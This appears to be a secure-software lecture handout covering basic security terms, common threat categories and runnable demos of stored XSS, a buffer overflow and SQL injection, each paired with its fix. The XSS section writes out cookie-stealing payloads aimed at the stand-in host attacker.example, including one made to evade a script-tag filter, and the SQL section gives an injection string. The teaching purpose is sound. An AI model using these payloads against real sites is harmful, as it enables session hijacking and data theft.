Lect1-Secure Software Concepts & Threats(1) (1).pdf
CYS 407 : Secure Software Design and Engineering
Topic: Secure Software Concepts & Threats
Ref: Official (ISC)2 Guide to the CSSLP CBK (Domain 1)

Agenda
• What is Software Security?
• Software Error, Fault and Failure
• Software Flaw vs Software Bug
• Software Security Challenges
• Concept of Holistic Security
• Software Development Life Cycle (SDLC)
• SDLC Models
• Risk Management

What is Software Security?
General question: Why can websites, servers, browsers, laptops, smartphones, Wi-Fi access points, network routers, mobile phones, cars, pacemakers, uranium enrichment facilities, ... be hacked?
Correct answer: Because they contain software.

What is Software Security?
Software security is the idea of engineering software so that it continues to function correctly under malicious attack.
• Software provides functionality, e.g. on-line exam results
• This functionality comes with certain risks
• E.g., what are the risks of on-line exam results? Privacy (score leakage); modification
• Software security is about managing these risks
"The most important thing is to find out what is the most important thing." (Shunryu Suzuki)

What is Software Security?
Software security draws heavily on:
• Software Engineering: the systematic application of engineering approaches to the development of software
• Programming Languages: sets of instructions used in computer programming to implement algorithms
• Security Engineering: concerned with building systems that remain secure despite malice or error

Security problems in software may be due to errors or mistakes at different stages of the software development life cycle, from the requirements stage through design and implementation. The following terminology is discussed in this context.
Software Error, Fault, Failure; Software Bug vs Flaw

Software Error (mistake)
A mistake in code is called an error. Common categories of software errors: functional, compilation, runtime, syntactical, logical, missing commands, communication problems, and so on. These mistakes can make an application malfunction (fail to function normally) or crash, and can also make it vulnerable to attack. Errors are attributed to the programmer or developer.

Software Error: Functionality Errors
Functionality is the way the software is intended to behave. Software has a functionality error if something you expect it to do is hard, awkward, confusing, or impossible. The expected functionality of a Cancel button is that the 'Create new project' window closes and none of the changes are saved (no new project is created). If the Cancel button is not clickable, that is a functionality error.
(Source: https://www.softwaretestinghelp.com/types-of-software-errors/)

Software Error: Missing Command Errors
This occurs when an expected command is missing. In the slide screenshot, the window allows the user to create a new project, but there is no option to exit the window without creating the project. Since no 'Cancel' option/button is provided, this is a missing command error.

Software Error: Syntactic Errors
Syntactic errors are misspelled words or grammatically incorrect sentences, and are very evident while testing a software GUI. In the slide screenshots, note the misspelled word 'Cancel' and the grammatically incorrect message.

Software Error: Error Handling Errors
Any error that occurs while the user is interacting with the software needs to be handled in a clear and meaningful manner. If not, it is called an error handling error. Take a look at the slide image:
The error message gives no indication of what the error is. Is it a missing mandatory field, a saving error, a page loading error, or a system error? Hence this is an error handling error.
(Source: https://www.softwaretestinghelp.com/types-of-software-errors/)

Software Error, Fault, Failure
• Error: a human mistake, related to developers; could be a logic or syntax error
• Fault: any deviation between actual and expected results; the result of an error; related to the tester
• Failure: occurs when a fault executes
Error leads to fault; fault leads to failure.

Software Flaw vs Bug
Bug: the result of a coding error at the implementation level; relates to the programmer; detecting and fixing bugs is relatively easy. A software bug is an unintended mistake in a program that causes the program to break in certain situations. Some bugs qualify as security bugs and might, for example, enable a malicious user to bypass access controls in order to obtain unauthorized privileges.
Flaw: a mistake at the design level; difficult to detect.

Software Flaw vs Bug: Who will explain?
(Slide exercise: the Python comparison operators, less than or equal to: <=, greater than or equal to: >=, are to be classified as FLAW, Error, or BUG.)

Software Development Security Problems
Problem areas in software development:
• Buffer overflow
• Command injection
• Cross-site scripting
• Failure to handle errors
• Failure to protect network traffic
• Failure to store and protect data securely
• Improper file access

Known Attacks on Software and Software Systems: Definitions
■ Vulnerability: a weakness in a system or software that can be exploited to make the system behave in an unintended way.
  Typical causes: insufficient testing, no input validation
■ Threat: a person or event that has the potential to impact a valuable resource in a negative manner. All kinds of social engineering attacks, ransomware, worms, and viruses are considered possible threats.
■ Attack: an intelligent act that is a deliberate attempt to evade security services and violate the security policy of a system.
Known types of attack?

Known Types of Attack
• Social engineering attacks
• Attacks against the application's software
• Attacks against the supporting infrastructure
• Physical attacks
Attackers gain sensitive information so that they can steal identities, customers or secrets. Why? For financial gain, to put a company out of business, etc. Attackers keep trying until a hole finally opens; attacks come from different angles: social engineering, the application's software, the supporting infrastructure, and physical attacks.

Social Engineering Attacks
(Sub-topics: Organization Penetration, IT Infrastructure Exploration, Phishing, Spam, Spoofing, Man in the Middle)
Social engineering, in the context of information security, refers to the psychological manipulation of people into performing actions or exposing confidential information; a type of confidence trick for the purpose of information gathering, fraud, or system access [Wikipedia].
Example: "I'm traveling in London and I've lost my wallet. Can you wire some money?"

Organization Penetration
A method of tricking people at work into giving access to company resources.
• E.g.
a person in disguise might visit a building as a representative from a vendor wanting to check a system.

IT Infrastructure Exploration
A method of obtaining information such as organizational charts and phone numbers by cold-calling under disguise. IT infrastructure is defined as the combined set of hardware, software, networks, facilities, etc.

Phishing
Phishing is a type of social-engineering attack that uses e-mail or other types of messages in an attempt to trick others into providing sensitive information, such as credit card numbers or passwords.

Spam
Spamming is a method of flooding the Internet with copies of the same message. Most spam consists of commercial advertisements sent as unwanted e-mail. Spam is also known as electronic junk mail or junk newsgroup postings. Spam mail is very annoying, since it keeps coming every day and keeps your mailbox full. Sometimes, when a user clicks a junk e-mail to read it, the e-mail attempts to phish the user into visiting another website.

Spoofing
Spoofing: a technique that spammers and virus writers use to change the "From" address in the messages they send. Types of spoofing:
• IP spoofing
• E-mail spoofing
• Web spoofing
IP spoofing: who will explain?
Man in the Middle
In a man-in-the-middle attack the attacker gets in the middle of a real run of a protocol. The possible uses of such attacks are:
• Theft of information
• Hijacking of an ongoing session to gain access to private network resources
• Traffic analysis to derive information about a network and its users

Attacks Against the Software Itself
(Sub-topics: Cross-site scripting (XSS), Buffer Overflows, SQL Code Injection, Time/Logic Bomb, Back door)
No software will ever be 100% completely safe, not for long anyhow. Old saying: "For every door shut, a new one opens." The same is true for software: for every countermeasure created, a new attack will be created to one-up the previous one.

XSS: Cross-Site Scripting
• A quite common vulnerability in web applications
• Allows attackers to insert malicious code, to bypass access controls or to launch "phishing" attacks
• "Cross-site": a foreign script sent via the server to the client
• The malicious script is executed in the client's web browser

XSS: Cross-Site Scripting (stored XSS flow; source: https://excess-xss.com/)
1. The attacker uses one of the website's forms to insert a malicious string into the website's database.
2. The victim requests a page from the website.
3. The website includes the malicious string from the database in the response and sends it to the victim.
4. The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.
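The four-step stored XSS flow above, replayed in code. This is an added example, not part of the lecture: the comment "database", the victim page, the attacker host attacker.example and the two payloads are all constructed for the demo, and step 4 (the browser executing the script) is stood in for by a regular-expression check rather than a real browser. It goes one step beyond the slide by also showing why stripping only the literal <script> tag is not a fix: an event-handler attribute such as onerror= executes just as well, whereas output encoding (html.escape) neutralises both.

```python
"""Stored XSS: attacker stores a string, site echoes it, victim's browser runs it.

Added example (not from the lecture). Everything here, the in-memory comment
store, the page template, the payloads and attacker.example, is constructed.
"""
import html
import re

# Step 1: the attacker submits this through the site's comment form. It is a
# constructed payload doing what step 4 of the slide describes: send
# document.cookie to the attacker's server.
ATTACKER_PAYLOAD = (
    "<script>document.location='http://attacker.example/?c='"
    "+document.cookie</script>"
)

# Second constructed payload with no <script> tag at all: the script rides in
# an event-handler attribute, which a "<script>-only" filter never sees.
ATTACKER_PAYLOAD_NO_SCRIPT_TAG = (
    "<img src=x onerror=\"fetch('http://attacker.example/?c='+document.cookie)\">"
)

# Constructed stand-in for the website's database table of comments.
comments_db = []


def store_comment(author, body):
    """Form handler: stores exactly what the user sent (encoding belongs at output, not here)."""
    comments_db.append({"author": author, "body": body})


def render_page_vulnerable():
    """Steps 2-3 as the vulnerable site does them: database strings pasted straight into HTML."""
    rows = "".join(f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in comments_db)
    return f"<html><body><ul>{rows}</ul></body></html>"


def render_page_fixed():
    """Same page, but every untrusted value is HTML-encoded at the point of output."""
    rows = "".join(
        f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</li>"
        for c in comments_db
    )
    return f"<html><body><ul>{rows}</ul></body></html>"


# Stand-in for step 4. A real browser executes <script> elements, on*= event
# handlers and javascript: URLs inside tags; we look for those three shapes
# inside a tag (between '<' and '>'), so text that has been encoded to &lt;...
# no longer counts as a tag.
_EXEC_IN_TAG = re.compile(
    r"<script\b|<[^>]*\bon\w+\s*=|<[^>]*\bjavascript:", re.IGNORECASE
)


def browser_would_execute_script(page_html):
    return _EXEC_IN_TAG.search(page_html) is not None


def naive_filter(body):
    """A common but insufficient 'fix': strip only the literal <script> tags."""
    return re.sub(r"</?script[^>]*>", "", body, flags=re.IGNORECASE)


def demo():
    """Run the whole flow once and report what the victim's browser would do."""
    comments_db.clear()
    store_comment("alice", "Great lecture!")
    store_comment("mallory", ATTACKER_PAYLOAD)
    store_comment("mallory", ATTACKER_PAYLOAD_NO_SCRIPT_TAG)

    vulnerable = render_page_vulnerable()
    fixed = render_page_fixed()
    filtered = "".join(naive_filter(c["body"]) for c in comments_db)
    return {
        "vulnerable_executes": browser_would_execute_script(vulnerable),
        "fixed_executes": browser_would_execute_script(fixed),
        "naive_filter_executes": browser_would_execute_script(filtered),
        "fixed_page": fixed,
    }


if __name__ == "__main__":
    r = demo()
    print("unencoded page runs attacker script:    ", r["vulnerable_executes"])
    print("html.escape'd page runs attacker script:", r["fixed_executes"])
    print("<script>-only filter still exploitable: ", r["naive_filter_executes"])
```

Note that html.escape is the right tool only for text placed in HTML body content; a value placed inside an attribute, a URL or a script block needs the encoding rules of that context.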
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. Is CSRF the same as XSS? No: in CSRF the attacker's forged request rides on the victim's existing session, while in XSS the attacker's script runs inside the victim's browser.

Buffer Overflows
A stack overflow exploit occurs when a user enters data that exceeds the memory reserved for the input. The input can change adjacent data or the return address on the stack.

Buffer Overflows: Example
  bool rootPriv = false;
  char name[8];
  cin >> name;
• When the program reads the name "Smith": name holds S m i t h (plus the terminator) and rootPriv is still false.
• When the program reads the name "Armstrong": the nine characters A r m s t r o n g plus the terminator do not fit in char name[8]; the extra bytes spill into whatever sits next in memory, here rootPriv, which is no longer false. (Whether rootPriv really is adjacent depends on how the compiler lays out the variables; the slide assumes it is.)

SQL Code Injection
• Values received from a web form, cookie, input parameter, etc. are typically not validated before being passed to SQL queries on a database server.
• An attacker can control the input that is sent to an SQL query and manipulate that input.
• The attacker may be able to execute code on the back-end database.
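The rootPriv / char name[8] slide above, reproduced byte for byte so the overwrite can be observed. This is an added example, not lecture code: a ctypes.Structure is used to pin down the layout the slide assumes (an 8-byte name buffer immediately followed by the privilege flag, declared here as a C int so that any non-zero byte reads as "true"), the unchecked reader copies the input plus its NUL terminator with no bound, just as cin >> name does, and the checked reader shows the fix. The record layout is an assumption about the compiled program; a real compiler may reorder or pad the variables.

```python
"""Buffer overflow from the lecture slide, watched through ctypes.

Added example (not lecture code). Record mirrors the slide's declarations;
the layout is assumed, not guaranteed by any real compiler.
"""
import ctypes

NAME_LEN = 8


class Record(ctypes.Structure):
    # Same order as the slide: char name[8] then the privilege flag.
    # int rather than bool so that the spilled byte 'g' (0x67) reads back
    # as a well-defined non-zero value, which C treats as true.
    _fields_ = [("name", ctypes.c_char * NAME_LEN), ("rootPriv", ctypes.c_int)]


def read_name_unchecked(rec, user_input):
    """What `cin >> name` does: copy every byte plus the NUL terminator, no bound check."""
    data = user_input.encode() + b"\0"
    # Demo guard only: we let the copy overrun name[8] into rootPriv, but not
    # past the end of the record, or we would trash the interpreter's heap.
    if len(data) > ctypes.sizeof(rec):
        raise ValueError("demo only overflows into the record itself")
    ctypes.memmove(ctypes.addressof(rec), data, len(data))


def read_name_checked(rec, user_input):
    """Hardened reader: refuse any input that does not fit, terminator included."""
    data = user_input.encode()
    if len(data) >= NAME_LEN:          # need one byte left for the NUL terminator
        return False
    rec.name = data                    # ctypes bounds-checks this assignment
    return True


def run(user_input, checked=False):
    """Feed one name to a fresh record and report what ended up in memory."""
    rec = Record()                     # zero-initialised: empty name, rootPriv = 0 (false)
    if checked:
        accepted = read_name_checked(rec, user_input)
    else:
        read_name_unchecked(rec, user_input)
        accepted = True
    raw = bytes(rec)                   # the record's bytes exactly as laid out in memory
    return {
        "accepted": accepted,
        "name_bytes": raw[:NAME_LEN],
        "rootPriv": rec.rootPriv,
        "is_root": rec.rootPriv != 0,  # the C truth test: any non-zero value is "true"
    }


if __name__ == "__main__":
    for name in ("Smith", "Armstrong"):
        r = run(name)
        print(f"unchecked {name!r}: name={r['name_bytes']!r} rootPriv={r['rootPriv']} root={r['is_root']}")
    r = run("Armstrong", checked=True)
    print(f"checked 'Armstrong': accepted={r['accepted']} root={r['is_root']}")
```

The unchecked run with "Armstrong" leaves "Armstron" in the buffer and the ninth character, plus its terminator, in rootPriv; the checked reader rejects the input before anything is written. Rejecting rather than silently truncating is the safer choice, since truncation can still turn one valid identity into another.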
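A runnable version of the products.php query that the following slides walk through. This is an added example, not lecture code: the Products table and its four rows are constructed in an in-memory SQLite database, the vulnerable function builds the SQL text by string concatenation exactly as the slide's PHP script does, and the fixed function binds the value as a parameter after converting it to a number. The 100' OR '1'='1 input is the one from the slide.

```python
"""SQL injection: the slide's products.php query against a local SQLite table.

Added example, not lecture code. The Products rows are constructed; the
query shape and the hostile input are taken from the slide.
"""
import sqlite3


def make_db():
    """Constructed sample data standing in for the shop's Products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProductDescription TEXT, Price REAL)")
    conn.executemany(
        "INSERT INTO Products VALUES (?, ?)",
        [("USB cable", 9.99), ("Keyboard", 49.00), ("Monitor", 199.00), ("Laptop", 899.00)],
    )
    return conn


def products_vulnerable(conn, val):
    """The PHP pattern from the slide: the request parameter is pasted into the SQL text."""
    sql = "SELECT * FROM Products WHERE Price < '" + val + "' ORDER BY ProductDescription"
    return sql, conn.execute(sql).fetchall()


def products_parameterised(conn, val):
    """Fix: validate the type, then bind the value, so it can never alter the query structure."""
    price = float(val)   # raises ValueError for "100' OR '1'='1": fail closed on non-numbers
    sql = "SELECT * FROM Products WHERE Price < ? ORDER BY ProductDescription"
    return sql, conn.execute(sql, (price,)).fetchall()


def demo():
    """Run the honest and the hostile request through both versions."""
    conn = make_db()
    honest = "100"
    hostile = "100' OR '1'='1"

    _, normal_rows = products_vulnerable(conn, honest)
    injected_sql, injected_rows = products_vulnerable(conn, hostile)
    _, safe_rows = products_parameterised(conn, honest)
    try:
        products_parameterised(conn, hostile)
        hostile_rejected = False
    except ValueError:
        hostile_rejected = True

    return {
        "normal_rows": normal_rows,
        "injected_sql": injected_sql,
        "injected_rows": injected_rows,
        "safe_rows": safe_rows,
        "hostile_rejected": hostile_rejected,
    }


if __name__ == "__main__":
    r = demo()
    print("val=100            ->", len(r["normal_rows"]), "rows")
    print("injected SQL       ->", r["injected_sql"])
    print("val=100' OR '1'='1 ->", len(r["injected_rows"]), "rows (all of them)")
    print("parameterised, hostile input rejected:", r["hostile_rejected"])
```

The float() conversion is not decoration: SQLite orders numbers before text, so binding the hostile string as-is would make Price < ? true for every row even with parameters, which is why the value's type is checked before it reaches the query.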
SQL Code Injection: Simple Three-Tier Architecture (database-driven web application)
HTML -> PHP script -> Database

SQL Code Injection
• http://www.victim.com/products.php?val=100
• Used to view products cheaper than $100; val passes the value you want to check for
• The PHP script creates a SQL statement based on it:
  SELECT * FROM Products WHERE Price < '100.00' ORDER BY ProductDescription;
(Reference: SQL Injection Attacks and Defense by Justin Clarke)

SQL Code Injection
• http://www.victim.com/products.php?val=100' OR '1'='1
  SELECT * FROM Products WHERE Price < '100.00' OR '1'='1' ORDER BY ProductDescription;
• The WHERE condition is always true, so the query returns all the products!
Practice from here: https://www.w3schools.com/sql/sql_orderby.asp

Logic Bomb vs Time Bomb
Logic Bomb: malicious code inserted into an application or operating system that causes it to perform some destructive or security-compromising activity whenever specified conditions are met, e.g. a specific date and time, deletion of a certain name from a database, access to a certain website,
or a visit to a specific page.
Time Bomb: a sub-form of logic bomb that is triggered by reaching some preset time, either once or periodically.

Back door
A backdoor is an undocumented method of gaining access to a program or a computer, by using another installed program or a rootkit, that bypasses normal authentication. The backdoor is generally written by the programmer who created the original program and is often known only to that person.
E.g. a developer may create a backdoor so that an application or operating system can be accessed for troubleshooting or other purposes. Attackers often use backdoors that they discover or install themselves as part of an exploit.

Attacks Against the Infrastructure
(Sub-topics: Denial of Service (DoS), Virus, Worm, Trojans, Spyware, Adware)

Denial of Service (DoS)
1. Denial of service implies that an attacker disables or corrupts networks, systems, or services with the intent to deny service to the intended users
2. DoS attacks involve either crashing the system or slowing it down to the point that it is unusable
3. DoS can also be as simple as deleting or corrupting information
4. In most cases, performing the attack simply involves running a hack or script
5. The attacker does not need prior access to the target

Virus vs Worms
Virus: program code that attaches itself to an application program; when the application program runs, the virus runs along with it. It has to rely on users transferring infected files/programs to other computer systems. Does it damage files? Yes, it deletes or modifies files.
Sometimes a virus also changes the location of files.
Worm: code that replicates itself in order to consume resources and bring the system down. It can use a network to replicate itself to other computer systems without user intervention. Does it damage files? Usually not; worms usually only monopolize the CPU and memory.
(Source: http://www.symantec.com/connect/articles/what-are-malware-viruses-spyware-and-cookies-and-what-differentiates-them)

Trojans
• A Trojan horse, or Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer.
• A Trojan can act as:
  • Keylogger: steals passwords, credit card numbers, bank details
  • Spam server: forces the victim PC to send spam
  • DDoS agent: the victim PC becomes a 'zombie computer' participating in a Distributed Denial of Service attack
• A user has to execute a Trojan for it to run.

Adware vs Spyware
Adware: a software application in which advertising banners are displayed while a program is running. Adware is used by companies for marketing purposes.
Spyware: a type of program that is installed, with or without your permission, on your personal computer. Spyware is used to collect information about users, their computer or their browsing habits; it tracks everything you do without your knowledge and sends it to a remote user.
Physical Attacks
(Sub-topics: Cutting Critical Lines, Stealing Hardware (PCs, Disks), Stealing Information (Data, Documentation), Stealing Resources for personal gain)
• Physical attacks can upset an organization just as much as software attacks
• Theft of mobile devices, code and information costs a company a big loss
• Flash drives and/or external/portable hard disks are a convenient way to copy information and walk out without devising any special plan
• Types of physical attacks:
  • Cutting critical lines
  • Stealing hardware
  • Stealing information and documentation
  • Stealing resources for personal gain

Any Questions?